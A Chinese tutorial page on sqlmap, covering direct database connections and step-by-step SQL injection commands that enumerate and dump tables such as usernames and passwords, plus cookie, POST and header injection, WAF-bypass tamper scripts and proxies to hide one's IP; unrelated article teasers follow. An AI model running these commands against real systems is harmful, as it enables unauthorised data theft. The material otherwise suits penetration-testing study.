sqlmap确定目标/实操
安装kali,kali自带sqlmap,在window系统中跟linux系统操作有区别
sqlmap是一款自动化SQL工具,打开kali终端,输入sqlmap,出现以下界面,就说明sqlmap可用。
sqlmap确定目标
一、sqlmap直连数据库
1、直连数据库获得旗标
sqlmap -d "mysql://root:123456@192.168.137.111:3306/dbb7" -f --banner
说明:
- -d 或 --ds 参数用于指定数据库的连接字符串。
- mysql://:指定了数据库的类型是MySQL。
- root:123456:这是数据库的用户名和密码,分别是root和123456。
- @192.168.137.111:指定了数据库的服务器IP地址,这里是192.168.137.111。
- :3306:指定了数据库服务器的端口号,MySQL的默认端口是3306。
- /dbb7:指定了要连接的数据库名称,这里是dbb7。
- --banner:这个选项指示sqlmap尝试检索并显示数据库的版本信息(即“banner”)。这对于了解目标数据库的类型和版本非常有用,因为不同的数据库类型和版本可能有不同的漏洞和弱点。
2、直连数据库获取用户及权限
sqlmap -d "mysql://root:123456@192.168.137.111:3306/dbb7" -f --banner -users
二、sqlmap实操
1、sqlmap完整的get注入
sqlmap直接对单一的url探测,参数使用-u或者--url
- 1、检测注入点
sqlmap -u 'http://xx/?id=1'
- 2、查看所有数据库
sqlmap -u 'http://xx/?id=1' --dbs --batch
- 3、查看当前使用的数据库
sqlmap -u 'http://xx/?id=1' --current -db --batch
- 4、查看表名
sqlmap -u 'http://xx/?id=1' -D 'security' --tables --batch
- 5、查看字段
sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --columns --batch
- 6、查看数据
sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --dump --batch
- 7、查看字段值
sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' -C 'username,password' --dump --batch
2、参数说明
指定数据库/表/字段
- -D 指定目标「数据库」,单/双引号包裹,常配合其他参数使用。
- -T 指定目标「表」,单/双引号包裹,常配合其他参数使用。
- -C 指定目标「字段」,单/双引号包裹,常配合其他参数使用。
如:sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' -C 'username' --dump
2、post请求
sqlmap探测post盲注
步骤一:获取http请求生成test.txt文件
步骤二:使用基于时间技术的sqlmap探测-r
如:sqlmap -r test.txt --technique T -p uname
检测post请求的注入点,使用BP等工具抓包,将http请求内容保存到txt文件中。
-r 指定需要检测的文件,SQLmap会通过post请求方式检测目标。
如:sqlmap -r test.txt
3、cookie注入
--cookie 指定cookie的值,单/双引号包裹。
如:sqlmap -u "http://xx?id=x" --cookie 'cookie'
4、sqlmap进行http头注入
指定注入位置进行注入,在保存的文件中,对于参数的修改为*,保存在txt文档中
再进行sqlmap -r /root/test.txt
5、sqlmap tamper脚本注入
--tamper 指定绕过脚本,绕过WAF或ids等。
sqlmap内置了很多绕过脚本,在 /usr/share/sqlmap/tamper/ 目录下
如:sqlmap -u 'http://xx/?id=1' --tamper 'uppercase.py'
三、sqlmap其他参数
(1)常见参数
- --method=GET 指定请求方式(GET/POST)
- --random-agent 随机切换UA(User-Agent)
- --user-agent ' ' 使用自定义的UA(User-Agent)
- --referer ' ' 使用自定义的 referer
- --threads 10 设置线程数,最高10
(2)性能优化参数
- --keep-alive 设置持久连接,加快探测速度
- --null-connection 检索没有body响应的内容,多用于注
- --thread 最大为10 设置多线程
- -o开启所有默认性能优化
- -smart 快速判断,节约时间
- 设置延迟 --delay 时间。当页面无变化,布尔无真假,从来不报错时用延时注入
- 设置超时 --timeout 时间
- 设置重新连接次数--retries 次数
(3)等级参数
- --batch 自动选择yes。
- --level=1 执行测试的等级(1-5,默认为1,常用3)
- --risk=1 风险级别(0~3,默认1,常用1),级别提高会增加数据被篡改的风险。
(4)代理参数
隐藏自己的真实ip
- --proxy http://ip: 端口
- --proxy -file 使用一个包含多条代理的文件中的代理
相关文章:
sqlmap确定目标/实操
安装kali,kali自带sqlmap,在window系统中跟linux系统操作有区别 sqlmap是一款自动化SQL工具,打开kali终端,输入sqlmap,出现以下界面,就说明sqlmap可用。 sqlmap确定目标 一、sqlmap直连数据库 1、直连数据库…...
Java笔试|面试 —— 对多态性的理解
谈谈对多态性的理解: 一个事物的多种形态(编译和运行时状态不一致性) 实现机制:通过继承、重写和向上转型(Object obj new 子类())来实现。 1.广义上的理解 子类对象的多态性,方法的重写&am…...
从RL的专业角度解惑 instruct GPT的目标函数
作为早期chatGPT背后的核心技术,instruct GPT一直被业界奉为里程碑式的著作。但是这篇论文关于RL的部分确写的非常模糊,几乎一笔带过。当我们去仔细审查它的目标函数的时候,心中不免有诸多困惑。特别是作者提到用PPO来做强化学习,…...
location匹配的优先级和重定向
nginx的重定向(rewrite) location 匹配 location匹配的就是后面的uri /wordpress 192.168.233.10/wordpress location匹配的分类和优先级 1.精确匹配 location / 对字符串进行完全匹配,必须完全符合 2.正则匹配 ^-前缀级别ÿ…...
观察矩阵(View Matrix)、投影矩阵(Projection Matrix)、视口矩阵(Window Matrix)及VPM矩阵及它们之间的关系
V表示摄像机的观察矩阵(View Matrix),它的作用是把对象从世界坐标系变换到摄像机坐标系。因此,对于世界坐标系下的坐标值worldCoord(x0, y0, z0),如果希望使用观察矩阵VM将其变换为摄像机坐标系下的坐标值localCoord(x…...
谷粒商城学习笔记-19-快速开发-逆向生成所有微服务基本CRUD代码
文章目录 一,使用逆向工程步骤梳理1,修改逆向工程的application.yml配置2,修改逆向工程的generator.properties配置3,以Debug模式启动逆向工程4,使用逆向工程生成代码5,整合生成的代码到对应的模块中 二&am…...
时序预测 | Matlab实现TCN-Transformer的时间序列预测
时序预测 | Matlab实现TCN-Transformer的时间序列预测 目录 时序预测 | Matlab实现TCN-Transformer的时间序列预测效果一览基本介绍程序设计 效果一览 基本介绍 基于TCN-Transformer模型的时间序列预测,可以用于做光伏发电功率预测,风速预测,…...
没想到MySQL 9.0这么拉胯
MySQL 7月1号发布了9.0版本,然而没想到并没有引起大家的狂欢,反而是来自DBA圈子的一篇吐槽,尤其是PG界吐槽更厉害。 难道MySQL现在真的这么拉胯了?本着好奇的态度,我也去下载了MySQL9.0的手册看了一下。确实有点让我大…...
开源 Wiki 系统 InfoSphere 2024.01.1 发布
推荐一套基于 SpringBoot 开发的简单、易用的开源权限管理平台,建议下载使用: https://github.com/devlive-community/authx 推荐一套为 Java 开发人员提供方便易用的 SDK 来与目前提供服务的的 Open AI 进行交互组件:https://github.com/devlive-commun…...
1.Introduction to Spring Web MVC framework
Web MVC framework 文档:22. Web MVC framework (spring.io) 概述 Web MVC框架(Web Model-View-Controller Framework)是一种用于构建Web应用程序的软件架构模式。MVC模式将应用程序分为三个主要组件:模型(Model&am…...
Onnx 1-深度学习-概述1
Onnx 1-深度学习-概述1 一: Onnx 概念1> Onnx 介绍2> Onnx 的作用3> Onnx 应用场景4> Onnx 文件格式1. Protobuf 特点2. onnx.proto3协议3> Onnx 模型基本操作二:Onnx API1> 算子详解2> Onnx 算子介绍三: Onnx 模型1> Onnx 函数功能1. np.random.rand…...
网络基础——udp协议
UDP协议(User Datagram Protocol,用户数据报协议)是OSI(Open System Interconnection,开放式系统互联)参考模型中一种无连接的传输层协议,它提供了一种简单的、不可靠的数据传输服务。以下是关于…...
分布式锁理解
介绍分布式锁,我觉得从项目的背景入手把 在伙伴匹配系统中,我创建了一个定时任务,做为缓存预热的手段 这个具体原因在Redis-CSDN博客 接下来切入正题: 想象每个服务器都有一个定时任务,都要对数据库或者缓存进行操…...
Android Gradle 开发与应用 (十): Gradle 脚本最佳实践
目录 1. 使用Gradle Kotlin DSL 1.1 什么是Gradle Kotlin DSL 1.2 迁移到Kotlin DSL 1.3 优势分析 2. 优化依赖管理 2.1 使用依赖版本管理文件 2.2 使用依赖分组 3. 合理使用Gradle插件 3.1 官方插件和自定义插件 3.2 插件管理的最佳实践 4. 任务配置优化 4.1 使用…...
c#获取本机的MAC地址(附源码)
在前一次的项目中,突然用到了这个获取本机的MAC地址,然后就研究了一下,记录下来,防止以后再用到, 使用winfrom做的,界面一个button,一个textBox,点了button以后给textBox赋值显示mac地址 附上源…...
sqlmap使用之-post注入、head注入(ua、cookie、referer)
1、post注入 1.1、方法一,通过保存数据包文件进行注入 bp抓包获取post数据 将数据保存到post.txt文件 加上-r指定数据文件 1.2、方法二、通过URL注入 D:\Python3.8.6\SQLmap>python sqlmap.py -u "http://localhost/login.php" --data "userna…...
XSS: 原理 反射型实例[入门]
原理 服务器未对用户输入进行严格校验,使攻击者将恶意的js代码,拼接到前端代码中,从而实现恶意利用 XSS攻击危害 窃取用户Cookie和其他敏感信息,进行会话劫持或身份冒充后台增删改文章进行XSS钓鱼攻击利用XSS漏洞进行网页代码的…...
Idea新增Module报错:sdk ‘1.8‘ type ‘JavaSDK‘ is not registered in ProjectJdkTable
文章目录 一,创建Module报错二,原因分析三,解决方案1,点击上图的加号,把JDK8添加进来即可2,点击左侧[Project],直接设置SDK为JDK8 四,配置检查与验证 一,创建Module报错 …...
基于RHCE基础搭建简单服务
目录 项目标题与需求一 配置IP地址server机node02机 二 配置web服务三 搭建dns服务器四 开启防火墙server firewalld 五 配置nfs服务器node02 nfsserver autofs 六 开启SELinux七 验证是否能访问www.rhce.com 项目标题与需求 项目标题: 项目需求: 现有…...
威纶通触摸屏软件离线仿真时出现报错8000端口占用或服务器断线
现象 威纶通触摸屏软件离线仿真时出现报错 显示8000端口被占用 或者是设备服务器断线的状态 处理方法 系统参数——HMI属性 端口号更改一下即可 或者关闭占用8000端口的应用 分享创作不易,请多多支持,点赞、收藏、关注! Ending~...
CAS详解
文章目录 CAS使用示例Unsafe类实现原理CAS问题 CAS CAS全称为Compare and Swap被译为比较并交换,是一种无锁算法。用于实现并发编程中的原子操作。CAS操作检查某个变量是否与预期的值相同,如果相同则将其更新为新值。CAS操作是原子的,这意味…...
【笔记】虚拟机中的主从数据库连接实体数据库成功后的从数据库不同步问题解决方法2
错误: Last_Errno: 1008 Last_Error: Coordinator stopped because there were error(s) in the worker(s). The most recent failure being: Worker 1 failed executing transaction ANONYMOUS at source log mysql-bin.000014, end_log_pos 200275. See error lo…...
【每日一练】python类和对象现实举例详细讲解
""" 本节课程目的: 1.掌握类描述现实世界实物思想 2.掌握类和对象的关系 3.理解什么事面向对象 """ #比如设计一个闹钟,在这里就新建一个类 class Clock:idNone #闹钟的序列号,也就是类的属性priceNone #闹…...
【学习css1】flex布局-页面footer部分保持在网页底部
中间内容高度不够屏幕高度撑不开的页面时候,页面footer部分都能保持在网页页脚(最底部)的方法 1、首先上图看显示效果 2、奉上源码 2.1、html部分 <body><header>头部</header><main>主区域</main><foot…...
Java中创建线程的几种方式
底层都是基于实现Runnable接口 1.继承thread类,new一个thread对象,实现run方法,无返回值 public class MyThread extends Thread {Overridepublic void run() {System.out.println("Thread created by extending Thread class is runn…...
[A-04] ARMv8/ARMv9-Cache的相关策略
ver0.2 前言 前面我们已经通过三篇文章反反复复的讲Cache的概念、结构、架构,相信大家对Cache已经大概有了初步的了解。这里简单归纳一下: (1) Cache从硬件视角看,是连接PE-Core和主存的一种存储介质,存储的数据是主存中数据的副本…...
【笔试常见编程题06】最近公共祖先、求最大连续bit数、二进制插入、查找组成一个偶数最接近的两个素数
1. 最近公共祖先 将一棵无穷大满二叉树的结点按根结点一层一层地从左往右编号,根结点编号为1。现给定a,b为两个结点。设计一个算法,返回a、b最近的公共祖先的编号。注意其祖先也可能是结点本身。 测试样例: 2,3 返回&a…...
【工具分享】Gophish——网络钓鱼框架
文章目录 Gophish安装方式功能简介 Gophish Gophish 是一个开源的网络钓鱼框架,它被设计用于模拟真实世界的钓鱼攻击,以帮助企业和渗透测试人员测试和评估他们的网络钓鱼风险。Gophish 旨在使行业级的网络钓鱼培训对每个人都是可获取的,它易…...
“职业三大底层逻辑“是啥呢?
大家好,我是有用就扩散。 掌握职业发展的三大底层逻辑以宏观视角看待自己的职业发展道路具备长远规划自己职业路劲的能力通过成就事件呈现自己的工作成绩 一、痛点陈述 不喜欢眼前的工作?眼前的工作琐碎没前途?找不到能力提升的方向时候会…...
飞睿智能无线高速uwb安全数据传输模块,低功耗、抗干扰超宽带uwb芯片传输速度技术新突破
在信息化的时代,数据传输的速度和安全性无疑是每个企业和个人都极为关注的话题。随着科技的飞速发展,超宽带(Ultra-Wideband,简称UWB)技术凭借其性能和广泛的应用前景,逐渐成为了数据传输领域的新星。今天&…...
wordpress做文字站/关键词seo优化排名
最近在学习使用EasyDL专业版训练模型,我想试着训练一个情感分析模型,但是手头缺少数据,于是我找到了NLPCC2014_sentiment,在GitHub可以找到,这里我Fork到了码云里以便下载: https://gitee.com/zheng_bo_pu/NLPCC2014_sentiment 下载好以后,打开其中一个数据集,这里我打开了sam…...
广州市住房和城乡建设厅网站首页/德芙巧克力软文推广
信号量的基本介绍: 信号量的本质是⼀种数据操作锁,它本⾝不具有数据交换的功能,⽽是通过控制其他的通信资源(⽂件,外部设备)来实现进程间通信, 它本只是⼀种外部资源的标识。信号量在此过程中负…...
建设职业注册中心网站/网络推广方案怎么写
70 爬楼梯 给定 n 节台阶,每次可以走一步或走两步,求一共有多少种方式可以走完这些台阶。 输入是一个数字,表示台阶数量;输出是爬台阶的总方式。 输入: 2 输出: 2 解释: 有两种方法可以爬到楼…...
泸西县建设小学网站/站长之家网站
推荐算法的核心在于对相似用户和相似物品的识别,下面手动重复下这个过程帮助理解。 数据准备: 初始数据: 1 101 5 1 102 3 1 103 2.5 2 101 2 2 102 2.5 2 103 5 2 104 2 3 101 2.5 3 104 4 3 105 4.5 3 107 …...
怎么在工商局网站查公司/互联网营销方案策划
一、继承 继承是一种创建新的类的方式,在python中,新建的类可以继承自一个或者多个父类,原始类称为基类或超类,新建的类称为派生类或子类。 python中类的继承分为:单继承和多继承 class ParentClass1: #定义父类passcl…...
西宁市精神文明建设网站/软文标题和内容
东莞八景,值得一游.松湖烟雨松湖烟雨位于“科技共山水一色”的松山湖科技产业园区。8平方公里水面的松山湖,四周峰峦环抱,湖水清澈,湖鸟轻鸣。每当晨霭雨烟,松山湖宛如薄纱遮面的少女,含羞玉立,静穆凝神&am…...